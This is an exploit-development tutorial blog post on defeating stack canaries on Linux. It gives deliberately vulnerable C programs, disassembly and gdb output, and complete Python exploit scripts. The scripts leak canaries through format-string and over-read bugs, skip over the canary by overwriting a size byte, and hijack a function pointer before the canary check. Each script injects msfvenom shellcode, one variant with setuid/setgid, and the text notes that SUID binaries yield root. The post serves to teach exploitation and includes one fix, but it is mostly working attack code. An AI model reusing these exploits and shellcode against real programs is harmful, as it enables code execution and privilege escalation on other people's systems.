[Exploit development] 0A- Dancing with Memory Guards: Breaking Canaries/Cookies, DEP/NX, and ASLR
Intro
In the previous post, we discussed stack-based buffer overflow vulnerabilities in depth from several aspects, including the methods used to discover them and how fuzzing can help. We talked about strategies for exploiting this type of vulnerability based on the nature of the targeted program and its working mechanisms. We also discussed methods of protection and defense, and explained some common mistakes that may lead to bypassing these defenses. You should read it before this post, as we will build on what was mentioned there.
One of the things we explained was hijacking the execution flow by overwriting the instruction pointer and forging it with another pointer that references our own instructions. In this way, we would force the program to execute arbitrary code of our own. Unfortunately, life isn’t that easy, as there are many powerful protections and mitigations that prevent us from doing this so simply.
But don’t worry, my friend. I don’t deny the power and effectiveness of these protections, especially when combined, making exploitation more difficult and complex. However, if we fully understand how these protections work and the inner workings of the targeted program, we can bypass them with creative tricks.
The F*ckin Mousetrap ( Cookies / Canaries )
This type of memory protection is exactly like a mousetrap. When your home has some openings that allow mice to enter and mess around, one solution you might take is to set traps to reduce the danger of these mice by luring them with some cheese. As soon as they fall into the trap, you get rid of them, which reduces their greater danger to vital things in the home. However, there are clever mice that can detect the trick, avoid the trap, and continue with their mission. That is where the philosophy of cookie/canary protection came from, and we will follow up on this same philosophy as mice to bypass them and not fall into the trap.
https://www.wibu.com/pl/magazine/keynote-articles/article/detail/traps-against-hacker.html
A canary/cookie is a random value generated when the program starts executing, so each run gets a unique value. This value is placed in each protected stack frame, right after the function's local data and variables and before the saved base pointer and return address. Before the function returns, it checks the previously stored value. If it has been hit, i.e., the value has changed, this indicates an overflow. Accordingly, the function does not return, and the program closes completely. That thwarts any exploit that attempts to overwrite the instruction pointer and redirect the program execution flow.
Analyzing Security Canaries/Cookies
Let’s take the following code as an example:
#include <stdio.h>
void main() {
    char cName[16];
    scanf("%s", cName);
    puts( cName );
}
And compile it as follows:
┌──(user㉿host)-[~]
└─$ gcc test.c -o test
Then we disassemble the main function and find the following instructions:
0000000000001149 <main>:
1149: 55 push rbp
114a: 48 89 e5 mov rbp,rsp
114d: 48 83 ec 10 sub rsp,0x10
1151: 48 8d 45 f0 lea rax,[rbp-0x10]
1155: 48 89 c6 mov rsi,rax
1158: 48 8d 05 a5 0e 00 00 lea rax,[rip+0xea5] # 2004 <_IO_stdin_used+0x4>
115f: 48 89 c7 mov rdi,rax
1162: b8 00 00 00 00 mov eax,0x0
1167: e8 d4 fe ff ff call 1040 <__isoc99_scanf@plt>
116c: 48 8d 45 f0 lea rax,[rbp-0x10]
1170: 48 89 c7 mov rdi,rax
1173: e8 b8 fe ff ff call 1030 <puts@plt>
1178: 90 nop
1179: c9 leave
117a: c3 ret
This is roughly the familiar format of the instructions we’ve seen in previous posts. But let me show you how it will look when we ask the compiler to integrate canary/cookie protection.
┌──(user㉿host)-[~]
└─$ gcc -fstack-protector test.c -o test
Look at this picture carefully and compare the resulting disassembly with the previous one.

In the prologue of the main function, eight bytes are loaded from the FS segment (fs:0x28 on x86-64 Linux) and stored on the stack just below the saved base pointer, at RBP-0x8. In the epilogue, the copy on the stack is compared with the original. The comparison is performed as follows:
- The canary/cookie previously stored on the stack gets loaded into the accumulator register (RAX).
- The original value in the FS segment gets subtracted from it.
- If both are the same, the result is zero and the Zero Flag gets set, allowing execution to continue to the ret instruction.
- Otherwise, the execution is redirected to a function called __stack_chk_fail that displays a fatal error message and terminates the process.
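The check described above can be modeled in a few lines of Python. This is only a toy sketch, not what the compiler emits: the `Frame` class, its layout, and the helper names are invented for illustration, and the zero low byte in `new_canary` is an assumption that mimics the glibc convention.

```python
import os

CANARY_SIZE = 8

def new_canary() -> bytes:
    # Assumption: zero low byte followed by random bytes (glibc-style)
    return b"\x00" + os.urandom(CANARY_SIZE - 1)

class Frame:
    """Toy stack frame laid out as [ buffer | canary | saved RBP | saved RIP ]."""

    def __init__(self, buf_size: int, master_canary: bytes):
        self.buf_size = buf_size
        self.master = master_canary  # plays the role of the value kept in the FS segment
        # "Prologue": the canary is stored right after the local buffer
        self.mem = bytearray(buf_size) + bytearray(master_canary) + bytearray(16)

    def unchecked_copy(self, data: bytes) -> None:
        # Like scanf("%s") or strcpy: copies without looking at the buffer size
        self.mem[0:len(data)] = data

    def epilogue_check(self) -> bool:
        # "Epilogue": compare the stack copy with the master value
        stored = bytes(self.mem[self.buf_size:self.buf_size + CANARY_SIZE])
        return stored == self.master

frame = Frame(16, new_canary())
frame.unchecked_copy(b"A" * 16)
print("fits the buffer :", frame.epilogue_check())
frame.unchecked_copy(b"A" * 17)
print("one byte too far:", frame.epilogue_check())
```

A single byte past the buffer is already enough to change the stored value, which is why a plain linear overflow cannot reach the saved instruction pointer unnoticed.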

When we pass an overly long input, execution is diverted to the __stack_chk_fail function, which displays an error on the screen telling us that stack smashing was detected, and the program gets killed by the __pthread_kill_implementation function.
The stack layout is as follows:
*--------------------------* <-- Frame data & Buffers
| |
| |
| |
-0x8 -> *--------------------------* <-- Canary / Cookie
| |
+0x0 -> *--------------------------* <-- Saved RBP ( Base Pointer )
| |
+0x8 -> *--------------------------* <-- Saved RIP ( Instruction Pointer )
| |
*--------------------------*
It’s really a big challenge because the canary is placed in a critical location, where we have to overwrite it to get into vital stuff like the instruction pointer.
Leaking it out Leads to Winning!
One strategy to defeat canaries/cookies is to leak them first, then craft a payload containing the leaked canary, causing the check to pass because the canary on the stack after the attack is still the same as the original canary. Let’s take an example:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
typedef struct {
    char data[256];
    char *cpReadData;
    int nSize;
} Buffer;
Buffer buf_new() {
    return (Buffer) { 0x00 };
}
void buf_write(Buffer *pBuf, char *cpData, size_t n) {
    if ( pBuf->nSize )
        pBuf->data[ pBuf->nSize-1 ] = ' ';
    memcpy( pBuf->data + pBuf->nSize, cpData, n );
    pBuf->nSize += n;
}
void buf_read(Buffer *pBuf) {
    if ( !pBuf->cpReadData )
        pBuf->cpReadData = pBuf->data;
    printf( pBuf->cpReadData );
    pBuf->cpReadData += pBuf->nSize;
}
void buf_readall(Buffer *pBuf) {
    printf( pBuf->data );
}
void main() {
    Buffer buf = buf_new();
    int nChoice, c;
    for ( ;; ) {
        printf( "\n\n1- Write\n2- Read\n3- Read full data\n4- Exit\n\nChoose: " );
        scanf( "%d", &nChoice );
        // Clearing the buffer so nothing breaks `getdelim` later ;)
        while ( (c = getchar()) != 0x0a && c != EOF );
        if ( nChoice == 1 ) {
            char *cpLine = NULL;
            size_t n = 0;
            printf( "Data: " );
            n = getdelim( (char **)&cpLine, &n, 0x0a, stdin );
            if ( ~n ) // Sanity check to avoid calling `buf_write` if `getdelim` failed
                buf_write( &buf, cpLine, n );
            free( cpLine );
        }
        else if ( nChoice == 2 )
            buf_read( &buf );
        else if ( nChoice == 3 )
            buf_readall( &buf );
        else if ( nChoice == 4 )
            break;
        else
            puts( "[-] Invalid choice!" );
    }
}
This is a simple program that allows users to write and read data interactively. Let’s compile and run it with the canary protection enabled:
┌──(user㉿host)-[~]
└─$ gcc -fstack-protector -zexecstack test.c -o test
┌──(user㉿host)-[~]
└─$ ./test
1- Write
2- Read
3- Read full data
4- Exit
Choose: 1
Data: Hello Guys
1- Write
2- Read
3- Read full data
4- Exit
Choose: 2
Hello Guys
1- Write
2- Read
3- Read full data
4- Exit
Choose: 1
Data: I'm 0xNinjaCyclone
1- Write
2- Read
3- Read full data
4- Exit
Choose: 2
I'm 0xNinjaCyclone
1- Write
2- Read
3- Read full data
4- Exit
Choose: 3
Hello Guys I'm 0xNinjaCyclone
1- Write
2- Read
3- Read full data
4- Exit
Choose: 4
┌──(user㉿host)-[~]
└─$
If you pay attention to the read functions, you will find that both are vulnerable to a format string vulnerability: user-controlled data is passed to the printf function as the format string rather than as an argument. The buf_read function is also vulnerable to a buffer over-read: after printing what the pBuf->cpReadData pointer points to, it advances the pointer without ever checking whether the new location still belongs to the buffer it is supposed to read from. Exploiting either of those two bugs would allow us to leak the secret canary/cookie.
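To see how quickly the over-read escapes the buffer, here is a small Python model of the two fields involved. It is a sketch under assumptions: `BufferModel` and `first_out_of_bounds_round` are names made up for this illustration, the pointer is tracked as an offset from `data`, and every write is assumed to have the same length.

```python
DATA_SIZE = 256  # sizeof(Buffer.data) in the C example

class BufferModel:
    """Tracks only nSize and cpReadData (as an offset from data)."""

    def __init__(self):
        self.n_size = 0
        self.read_off = None  # None plays the role of a NULL cpReadData

    def write(self, n: int) -> None:
        self.n_size += n  # pBuf->nSize += n

    def read(self) -> int:
        if self.read_off is None:
            self.read_off = 0  # cpReadData = data
        start = self.read_off
        # The bug: the pointer advances by the TOTAL size, not by what was printed
        self.read_off += self.n_size
        return start

def first_out_of_bounds_round(chunk: int, max_rounds: int = 1000):
    """Alternate write(chunk)/read() and report when a read starts outside data."""
    model = BufferModel()
    for rnd in range(1, max_rounds + 1):
        model.write(chunk)
        start = model.read()
        if start >= DATA_SIZE:
            return rnd, start
    return None

print(first_out_of_bounds_round(11))
```

With 11-byte writes such as "Hello Guys\n", only 88 bytes have been written by the eighth round, yet the read pointer already sits beyond the 256-byte array.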

As you can see, we can exploit the format string bug to leak the canary by injecting %49$p as a payload via the write function and leaking it out by leveraging the read function. Read the format string exploitation post to understand what we did. We can automate this using Python as follows:
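The index 49 is specific to this build, so on another binary you would normally probe several positions and pick the value that looks like a canary. The helpers below are a hedged sketch of that idea: `probe`, `parse_pointer`, and `looks_like_canary` are hypothetical names, and the heuristic (zero low byte, non-zero top 16 bits) is an assumption that fits glibc canaries on x86-64 but can misfire.

```python
import re

def probe(index: int) -> bytes:
    """Format-string probe printing the index-th variadic argument as a pointer."""
    return b"%" + str(index).encode() + b"$p"

def parse_pointer(line: bytes):
    """Return the first 0x... value in a line of output, or None if there is none."""
    match = re.search(rb"0x[0-9a-fA-F]+", line)
    return int(match.group(0), 16) if match else None

def looks_like_canary(value: int) -> bool:
    # Heuristic only: canaries end in a zero byte, while user-space pointers
    # on x86-64 usually have their top 16 bits clear
    low_byte_zero = (value & 0xFF) == 0
    uses_top_bits = (value >> 48) != 0
    return value != 0 and low_byte_zero and uses_top_bits

print(probe(49))
print(looks_like_canary(parse_pointer(b"Choose: 0xe1125f7dcee84f00")))
print(looks_like_canary(0x7fffffffdd48))
```

The sample value is the canary observed later in this post; a stack address like 0x7fffffffdd48 is rejected by the same test.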
def leak_canary(p: Popen):
    p.stdin.write( b"1\n" + b"%49$p\n" + b"2\n" )
    p.stdin.flush()
    out = b""
    canary_pos = -1
    n = 0
    while n < 1024:
        out = p.stdout.readline()
        canary_pos = out.find( b"0x" )
        if bool( ~canary_pos ):
            break
        n += 1
    else:
        return -1
    canary = int( out[canary_pos : canary_pos+18], 16 )
    return canary
This function takes a handle to the target process, injects the payload, leaks the canary, and returns it to the caller as an integer, or returns -1 on failure.
Now, we can craft a payload that overwrites the canary with the correct value, injects a shellcode, and redirects the execution flow by overwriting the instruction pointer.
def hijack_exec(p: Popen, canary):
    payload = b""
    payload += b"A" * 0x112 # Fills the stack frame
    payload += struct.pack( "<Q", canary ) # Places the correct canary value
    payload += b"B" * 0x8 # Base pointer
    payload += struct.pack( "<Q", 0x7fffffffdd60 + 0x40 ) # Instruction pointer
    payload += b"\x90" * 0x40 # NOPs for padding
    payload += buf # Shellcode
    p.stdin.write( b"1\n" )
    p.stdin.write( payload + b"\n" )
    p.stdin.flush()
We followed the same approach we discussed in the buffer overflow post, filling the frame with junk data with the canary in place to bypass the protection, injecting the shellcode into the previous frame, and replacing the instruction pointer to reference the shellcode. However, for the shellcode to execute, the main function must return. We can do this using the fourth function (exit), which breaks the loop and allows the main function to return.
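The 0x112 filler is not arbitrary. A sketch of the arithmetic, assuming the canary sits 0x118 bytes after the start of the buffer (the frame layout used in this post) and that the first write left the six bytes of "%49$p\n" in the buffer; `ctypes` is used here only to compute the struct offsets, with `c_uint64` standing in for the 8-byte `char *`:

```python
import ctypes

class Buffer(ctypes.Structure):
    # Mirror of the C struct from the vulnerable program
    _fields_ = [
        ("data", ctypes.c_char * 256),
        ("cpReadData", ctypes.c_uint64),  # stand-in for an 8-byte char* on x86-64
        ("nSize", ctypes.c_int),
    ]

CANARY_OFFSET = 0x118                # assumption: distance from data[0] to the canary
FIRST_WRITE = len(b"%49$p\n")        # bytes already stored by the leak step

# buf_write() appends at data + nSize, so the second payload starts at offset 6
filler = CANARY_OFFSET - FIRST_WRITE

print(hex(Buffer.cpReadData.offset), hex(Buffer.nSize.offset), hex(ctypes.sizeof(Buffer)))
print(hex(filler))
```

If the leak payload had a different length, the filler would have to change by the same amount.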
def exit_target(p: Popen):
    p.stdin.write( b"4\n" )
This function must be called after injection to force the program to execute shellcode.
def main():
    # We use 'stdbuf -o0' to force the targeted program pipes to be flushed
    # So we can read leaked canary/cookie immediately
    p = Popen( ["stdbuf", "-o0", TARGET_PATH], stdin=PIPE, stdout=PIPE )
    # Make stdout non-blocking when using read/readline
    flags = fcntl.fcntl( p.stdout, fcntl.F_GETFL )
    fcntl.fcntl( p.stdout, fcntl.F_SETFL, flags | os.O_NONBLOCK )
    canary = leak_canary( p )
    if bool( ~canary ):
        print( "Canary : 0x%x" % canary )
        hijack_exec( p, canary )
        exit_target( p )
        out, _ = p.communicate()
        print( out.decode() )
    else:
        exit_target( p )
        print( "[-] Failed to leak the canary" )
In the main function, we start the target process with the stdbuf -o0 command so that we can read its output while it is running, even if the process doesn’t flush its output pipes. We also make the output pipe non-blocking so that our reads never get stuck in a deadlock. Next, we leak the canary. If we succeed, we inject the payload and trigger the redirected execution flow using the exit option. If we fail, the exploit tells the target to exit and reports the failure.
Let’s run the exploit:

Great, we bypassed the stack canary and executed shellcode that runs the ‘id’ command. If the program is owned by root and has the SUID bit set, we can gain root privileges, as we have seen in the previous blog post.
Here is the full exploitation code:
#!/usr/bin/python3
import struct, os, fcntl
from subprocess import Popen, PIPE
TARGET_PATH = "./test"
# msfvenom -a x64 --platform linux -p linux/x64/exec -b "\x0a" -f py AppendExit=true CMD="id"
buf = b""
buf += b"\x48\xb8\x2f\x62\x69\x6e\x2f\x73\x68\x00\x99\x50"
buf += b"\x54\x5f\x52\x66\x68\x2d\x63\x54\x5e\x52\xe8\x03"
buf += b"\x00\x00\x00\x69\x64\x00\x56\x57\x54\x5e\x6a\x3b"
buf += b"\x58\x0f\x05\x48\x31\xff\x6a\x3c\x58\x0f\x05"
def leak_canary(p: Popen):
    p.stdin.write( b"1\n" + b"%49$p\n" + b"2\n" )
    p.stdin.flush()
    out = b""
    canary_pos = -1
    n = 0
    while n < 1024:
        out = p.stdout.readline()
        canary_pos = out.find( b"0x" )
        if bool( ~canary_pos ):
            break
        n += 1
    else:
        return -1
    canary = int( out[canary_pos : canary_pos+18], 16 )
    return canary
def hijack_exec(p: Popen, canary):
    payload = b""
    payload += b"A" * 0x112 # Fills the stack frame
    payload += struct.pack( "<Q", canary ) # Places the correct canary value
    payload += b"B" * 0x8 # Base pointer
    payload += struct.pack( "<Q", 0x7fffffffdd60 + 0x40 ) # Instruction pointer
    payload += b"\x90" * 0x40 # NOPs for padding
    payload += buf # Shellcode
    p.stdin.write( b"1\n" )
    p.stdin.write( payload + b"\n" )
    p.stdin.flush()
def exit_target(p: Popen):
    p.stdin.write( b"4\n" )
def main():
    # We use 'stdbuf -o0' to force the targeted program pipes to be flushed
    # So we can read leaked canary/cookie immediately
    p = Popen( ["stdbuf", "-o0", TARGET_PATH], stdin=PIPE, stdout=PIPE )
    # Make stdout non-blocking when using read/readline
    flags = fcntl.fcntl( p.stdout, fcntl.F_GETFL )
    fcntl.fcntl( p.stdout, fcntl.F_SETFL, flags | os.O_NONBLOCK )
    canary = leak_canary( p )
    if bool( ~canary ):
        print( "Canary : 0x%x" % canary )
        hijack_exec( p, canary )
        exit_target( p )
        out, _ = p.communicate()
        print( out.decode() )
    else:
        exit_target( p )
        print( "[-] Failed to leak the canary" )
if __name__ == '__main__':
    main()
Therefore, the reading functions must be modified as follows to prevent such a leak from occurring:
#include <stdbool.h>
bool g_bCanRead = false;
void buf_write(Buffer *pBuf, char *cpData, size_t n) {
    if ( pBuf->nSize )
        pBuf->data[ pBuf->nSize-1 ] = ' ';
    memcpy( pBuf->data + pBuf->nSize, cpData, n );
    pBuf->nSize += n;
    g_bCanRead = true;
}
void buf_read(Buffer *pBuf) {
    if ( !pBuf->cpReadData )
        pBuf->cpReadData = pBuf->data;
    if ( !g_bCanRead ) {
        fputs( "[-] Cannot Read", stderr );
        return;
    }
    printf( "%s", pBuf->cpReadData );
    pBuf->cpReadData += pBuf->nSize;
    g_bCanRead = false;
}
void buf_readall(Buffer *pBuf) {
    printf( "%s", pBuf->data );
}
This modification fixes the memory disclosure vulnerabilities in the program by using the printf function in a safe way instead of passing the user input directly as a format, and by placing restrictions on the buf_read function to prevent over-reading the buffer.
┌──(user㉿host)-[~]
└─$ python3 exploit.py
[-] Failed to leak the canary
The exploit we developed is no longer effective. Fixing the memory disclosure bugs has broken it, as it relied primarily on exploiting one of them in the exploitation chain.
Don’t Worry We Still Can Leak It Without Additional Bugs
Having a vulnerability that allows data to be leaked from memory can be very helpful, but this doesn’t always happen. In such cases, the alternative solution is to use the same buffer overflow vulnerability you have in an attempt to leak secret and sensitive data from memory. Let’s review the stack layout. It looks like this:
0x00 -> *--------------------------* <-- Injection Point
| |
| |
| |
| |
| |
| |
0x100-> *--------------------------* <-- Buffer->cpReadData
| |
0x108-> *--------------------------* <-- Buffer->nSize
| |
0x110-> *--------------------------* <-- Junk data
| |
0x118-> *--------------------------* <-- Canary / Cookie
| |
0x120-> *--------------------------* <-- Saved RBP ( Base Pointer )
| |
0x128-> *--------------------------* <-- Saved RIP ( Instruction Pointer )
| |
*--------------------------*
Don’t you notice something? The Buffer->cpReadData pointer used to read memory is under our control. We can forge that address and make it point to any other location we want in memory and leak its content. Our plan will go as follows:
- Filling the buffer until getting into the targeted pointer using the write function.
- Overwriting the Buffer->cpReadData with the canary address.
- Leaking out the canary by triggering the read function.
- Triggering the write function again to overwrite the remaining data with a crafted payload.
- Triggering shellcode execution by leveraging the exit function that allows the main to return.
(gdb) c
Continuing.
Breakpoint 1, 0x00005555555553cf in main ()
(gdb) x/a $rbp-8
0x7fffffffdd48: 0xe1125f7dcee84f00
I attached gdb to the target process and put a breakpoint in the main function. After examining the canary, I found that it lives at 0x7fffffffdd48 in memory. However, there is a problem here: the canary always contains a null byte in its lowest-order position (Least Significant Byte), and on a little-endian machine that byte is stored first, so printf would stop before printing anything. Therefore, we have to read from that address plus one so the null byte doesn’t stop us. We then obtain seven bytes from the leaked data and prepend the null byte ourselves.
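The effect of that null byte is easy to check offline with the value from the gdb session. This is a minimal sketch: `c_string_at` is a helper invented here to imitate a read that stops at the first NUL, and it assumes none of the other seven canary bytes happens to be zero.

```python
import struct

def c_string_at(memory: bytes, offset: int) -> bytes:
    """Bytes a C-string read would return: from offset up to the first NUL."""
    end = memory.find(b"\x00", offset)
    return memory[offset:] if end == -1 else memory[offset:end]

canary = 0xe1125f7dcee84f00                  # value seen in the gdb session
stack = struct.pack("<Q", canary) + b"\x00"  # trailing NUL only terminates the toy read

at_base = c_string_at(stack, 0)   # reading at the canary address itself
leaked = c_string_at(stack, 1)    # reading at the canary address plus one
rebuilt = struct.unpack("<Q", b"\x00" + leaked)[0]

print(at_base, leaked.hex(), hex(rebuilt))
```

Reading at the base address returns nothing, while reading one byte further returns the seven remaining bytes, and putting the zero back in front restores the original value.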
def leak_canary(p: Popen):
    payload = b""
    payload += b"A" * 0x100 # Filling the stack frame
    payload += struct.pack( "<Q", 0x7fffffffdd49 ) # Buffer->cpReadData
    payload += (b"\x00" * 0x8) # Buffer->nSize ( To avoid touching it )
    p.stdin.write( b"1\n" + payload + b"\n2\n" )
    p.stdin.flush()
    out = b""
    canary_pos = -1
    n = 0
    while n < 1024:
        out = p.stdout.readline()
        canary_pos = out.find( b"Choose: " )
        if bool( ~canary_pos ) and canary_pos+15 < len(out):
            canary_pos += 8
            break
        n += 1
    else:
        return -1
    canary = struct.unpack( "<Q", b"\x00" + out[canary_pos : canary_pos+7] )[ 0 ]
    return canary
This function does what we discussed earlier: it leaks the canary data, attempts to parse it into an integer value, and then returns it to the caller. Things are going well, so we just need to make a few changes to the hijack_exec function, and everything will be in order.
def hijack_exec(p: Popen, canary):
    payload = b""
    payload += b"A" * 0x7 # Fills the stack frame
    payload += struct.pack( "<Q", canary ) # Places the correct canary value
    payload += b"B" * 0x8 # Base pointer
    payload += struct.pack( "<Q", 0x7fffffffdd60 + 0x40 ) # Instruction pointer
    payload += b"\x90" * 0x40 # NOPs for padding
    payload += buf # Shellcode
    p.stdin.write( b"1\n" )
    p.stdin.write( payload + b"\n" )
    p.stdin.flush()
We changed almost nothing except the first line, as the leak_canary function will fill most of the stack frame, leaving only a little space on the stack that we need to overflow to get into vital stuff.
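Why exactly seven bytes? The two writes can be replayed on a fake frame to check the arithmetic. This is a sketch under assumptions: the offsets come from the stack layout shown earlier, `buf_write` is a Python model of the C function rather than the real thing, and the shellcode and NOP sled are left out because only the positions matter here.

```python
import struct

# Offsets from the start of Buffer.data, per the stack layout shown earlier
NSIZE_OFF, CANARY_OFF, RBP_OFF, RIP_OFF = 0x108, 0x118, 0x120, 0x128

def buf_write(frame: bytearray, payload: bytes) -> None:
    """Python model of the vulnerable C buf_write()."""
    n_size = struct.unpack_from("<i", frame, NSIZE_OFF)[0]
    if n_size:
        frame[n_size - 1] = ord(" ")
    frame[n_size:n_size + len(payload)] = payload           # memcpy, no bounds check
    n_size = struct.unpack_from("<i", frame, NSIZE_OFF)[0]  # memcpy may have clobbered it
    struct.pack_into("<i", frame, NSIZE_OFF, n_size + len(payload))

def simulate(canary: bytes, canary_addr: int, new_rip: int) -> bytearray:
    frame = bytearray(0x200)
    frame[CANARY_OFF:CANARY_OFF + 8] = canary
    # First write: fill data, forge cpReadData, zero nSize, plus the newline
    leak = b"A" * 0x100 + struct.pack("<Q", canary_addr + 1) + b"\x00" * 8 + b"\n"
    buf_write(frame, leak)
    # Second write starts at nSize, which is now 0x111
    hijack = b"A" * 0x7 + canary + b"B" * 8 + struct.pack("<Q", new_rip) + b"\n"
    buf_write(frame, hijack)
    return frame

canary = bytes.fromhex("004fe8ce7d5f12e1")
frame = simulate(canary, 0x7fffffffdd48, 0x7fffffffdd60 + 0x40)
print(bytes(frame[CANARY_OFF:CANARY_OFF + 8]) == canary)
print(hex(struct.unpack_from("<Q", frame, RIP_OFF)[0]))
```

The first write is 0x111 bytes long including its newline, so the second one begins at offset 0x111 and needs 0x118 - 0x111 = 7 filler bytes to line up with the canary.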

Bingo, our plan worked.
Jumping Over The Sh1t
Not all programs are designed to operate interactively. Many take input from the user and perform their tasks directly in one fell swoop. In this case, we cannot first leak the canary, whether through a vulnerability or another technique, and then complete the attack by using the overflow to hijack the program’s execution. In such cases, we need a creative way to defeat this protection with one shot. This isn’t easy and depends mainly on the logic of the targeted program and how it works. Let us take an example:
#include <stdio.h>
#include <stdlib.h>
typedef struct {
    char data[64];
    int nSize;
} Buffer;
Buffer buf_new() {
    return (Buffer) { 0x00 };
}
void buf_write(Buffer *pBuf, char *cpData, size_t n) {
    while ( n-- )
        pBuf->data[ pBuf->nSize++ ] = *cpData++;
}
void buf_read(Buffer *pBuf) {
    printf( "%s", pBuf->data );
}
void main() {
    Buffer buf = buf_new();
    char *cpLine = NULL;
    size_t n = 0;
    printf( "Data: " );
    n = getdelim( (char **)&cpLine, &n, 0x0a, stdin );
    if ( ~n ) // Sanity check to avoid calling `buf_write` if `getdelim` failed
        buf_write( &buf, cpLine, n );
    puts( "Your Data :" );
    buf_read( &buf );
}
This example is similar to the previous one. There’s nothing new in it except that it doesn’t work interactively. It reads from the user and prints the user’s input to the screen.
┌──(user㉿host)-[~]
└─$ gcc -fstack-protector -zexecstack test.c -o test
┌──(user㉿host)-[~]
└─$ ./test
Data: Hello Guys, I'm 0xNinjaCyclone.
Your Data :
Hello Guys, I'm 0xNinjaCyclone.
Focus well on this line:
pBuf->data[ pBuf->nSize++ ] = *cpData++;
It looks like normal code that copies data from one memory location to another byte by byte. But it’s not, my friend. We can abuse it in a very sinister way to jump over the canary without damaging it. Let me explain it in more detail so you understand what I mean. It indexes into the buffer using the pBuf->nSize value, copies one byte from the memory pointed to by the cpData pointer to that location, and increments both values by one so that it can move the next byte in the next iteration. It continues doing that in a loop until all the data has been moved.
This variable, which tells the program where to write data, sits right after the buffer, so it is under our control. However, we can’t overwrite all of it. We can only change its lowest-order byte, because as soon as that byte changes, the very next write lands at the new location. This is enough to defeat the protection. We can make the copy jump directly to the instruction pointer without having to write sequentially and destroy the canary.
#!/usr/bin/python3
import struct
with open("payload", "wb") as f:
    f.write( b"A" * 64 ) # Fills the Buffer
    f.write( b"\x58" ) # ( (unsigned char *) &Buffer->nSize )[0] ( LSB )
    f.write( struct.pack("<Q", 0x7fffffffdd70) ) # Instruction Pointer
    f.write( b"\x90" * 0x40 ) # Own Code ( NOPs )
Let’s try this exploit and see if it will succeed in jumping over the canary or not.

As you can see, we’ve successfully defeated the canary and overwritten the instruction pointer, allowing us to hijack the program’s execution flow.
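The jump can also be replayed offline on a fake frame. The sketch below makes two assumptions that are not spelled out in the text: the saved instruction pointer sits 0x58 bytes after the start of the buffer (which is what the 0x58 byte in the payload implies, putting the canary at 0x48), and the compiled loop stores the incremented nSize before it stores the data byte.

```python
import struct

NSIZE_OFF, CANARY_OFF, RIP_OFF = 0x40, 0x48, 0x58  # offsets from Buffer.data

def buf_write(frame: bytearray, payload: bytes) -> None:
    """Model of: while ( n-- ) pBuf->data[ pBuf->nSize++ ] = *cpData++;"""
    for byte in payload:
        idx = struct.unpack_from("<i", frame, NSIZE_OFF)[0]
        struct.pack_into("<i", frame, NSIZE_OFF, idx + 1)  # nSize++ is stored first
        frame[idx] = byte                                  # then data[old nSize] = byte

def run(canary: bytes, new_rip: int) -> bytearray:
    frame = bytearray(0x100)
    frame[CANARY_OFF:CANARY_OFF + 8] = canary
    payload = b"A" * 64 + b"\x58" + struct.pack("<Q", new_rip) + b"\x90" * 0x40
    buf_write(frame, payload)
    return frame

canary = bytes.fromhex("004fe8ce7d5f12e1")  # sample value, any 8 bytes work
frame = run(canary, 0x7fffffffdd70)
print(bytes(frame[CANARY_OFF:CANARY_OFF + 8]) == canary)
print(hex(struct.unpack_from("<Q", frame, RIP_OFF)[0]))
```

The 65th byte lands on the low byte of nSize itself, so the next eight bytes go straight to offset 0x58 and the region between 0x44 and 0x58, canary included, is never written.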
PreEmpting The Canary/Cookie Protection
Another way to bypass this type of protection is to hijack the execution flow by some means other than the saved instruction pointer, before the canary value is validated. In that case, the bypass works even if the canary value has been destroyed. There are many scenarios that allow us to hijack the execution flow:
- Function Pointers: If we can control one of the function pointers and it gets called before the canary check occurs, we can bypass that protection.
- V-Table: It’s really magic. It’s a table that holds pointers to the virtual methods of a specific class, supporting polymorphism in the C++ language so that each object calls exactly its corresponding methods without any conflict with its parent’s methods. If we can control that table, or the pointer to it stored in the object, we can leverage any of its methods to execute our own code without being detected by the canary protection.
- Windows SEH: SEH stands for Structured Exception Handling, a feature developed by Microsoft for the C/C++ languages to handle specific exception cases (such as hardware faults). These handlers are located primarily in the stack. If we can overwrite one of them and then trigger an exception, we can leverage it to get code execution (before the canary validation).
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdbool.h>
typedef struct _Buffer {
    char data[64];
    int nSize;
    void (*write)(struct _Buffer *, char *, size_t);
    void (*read)(struct _Buffer *);
} Buffer;
void buf_write(Buffer *pBuf, char *cpData, size_t n) {
    memcpy( pBuf->data, cpData, n );
    pBuf->nSize += (int) n;
}
void buf_read(Buffer *pBuf) {
    puts( "Your Data :" );
    printf( "%s", pBuf->data );
}
Buffer buf_new(bool bShouldRead) {
    return (Buffer) {
        .data = { 0 },
        .nSize = 0,
        .write = buf_write,
        .read = ( bShouldRead ) ? buf_read : NULL
    };
}
void main(int argc, char **argv) {
    Buffer buf = buf_new( (bool)(argc > 1 && strcmp(argv[1], "-r") == 0) );
    char *cpLine = NULL;
    size_t n = 0;
    printf( "Data: " );
    n = getdelim( (char **)&cpLine, &n, 0x0a, stdin );
    if ( ~n ) // Sanity check to avoid calling `buf_write` if `getdelim` failed
        buf.write( &buf, cpLine, n );
    if ( buf.read )
        buf.read( &buf );
}
This example is very similar to the previous one, except that in this the Buffer structure has additional members that hold pointers to its associated functions, and during initialization in the buf_new function, the addresses of those functions are assigned to the structure instance.
┌──(user㉿host)-[~]
└─$ gcc -fstack-protector -zexecstack test.c -o test
┌──(user㉿host)-[~]
└─$ ./test -r
Data: Hello World!
Your Data :
Hello World!
Notice that the read function pointer sits after the data buffer, so it is under our control, and it gets called when the program is run with the -r option. This call happens before the canary check, allowing us to preempt the protection, hijack the program execution flow, and execute our own code.

As we said before, the function pointer we control gets called before the canary check. We can abuse it by making it call our shellcode.
#!/usr/bin/python3
import struct
# msfvenom -a x64 --platform linux -p linux/x64/exec -b "\x0a" -f py AppendExit=true PrependSetuid=true PrependSetgid=true CMD=id
buf = b""
buf += b"\x48\x31\xff\x6a\x69\x58\x0f\x05\x48\x31\xff\x6a"
buf += b"\x6a\x58\x0f\x05\x48\xb8\x2f\x62\x69\x6e\x2f\x73"
buf += b"\x68\x00\x99\x50\x54\x5f\x52\x66\x68\x2d\x63\x54"
buf += b"\x5e\x52\xe8\x03\x00\x00\x00\x69\x64\x00\x56\x57"
buf += b"\x54\x5e\x6a\x3b\x58\x0f\x05\x48\x31\xff\x6a\x3c"
buf += b"\x58\x0f\x05"
with open("payload", "wb") as f:
    f.write( b"A" * 80 ) # Fills the Buffer
    f.write( struct.pack("<Q", 0x7fffffffdd70 + 0x40) ) # Function Pointer
    f.write( b"\x90" * 0x80 ) # NOPs for padding
    f.write( buf ) # Shellcode
